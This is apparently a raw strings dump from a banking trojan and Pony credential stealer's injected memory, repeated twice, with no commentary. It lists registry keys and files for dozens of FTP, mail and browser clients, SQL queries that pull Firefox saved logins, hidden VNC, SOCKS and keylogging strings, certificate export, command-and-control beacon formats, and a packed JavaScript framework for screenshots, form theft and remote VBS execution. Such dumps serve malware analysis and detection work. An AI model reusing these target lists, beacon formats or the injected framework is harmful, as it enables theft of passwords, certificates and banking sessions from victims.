SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
&.ipO
;&;,;3;^;
:$:,:7:?:
9”9C9
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
TPAutoConnect.exe_2160_rwx_00390000_00058000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
&.ipO
;&;,;3;^;
:$:,:7:?:
9”9C9
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
TPAutoConnect.exe_2160_rwx_01A70000_0007E000:
.text
`.rdata
@.data
.reloc
HHt.HHt
hu2.iuj
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
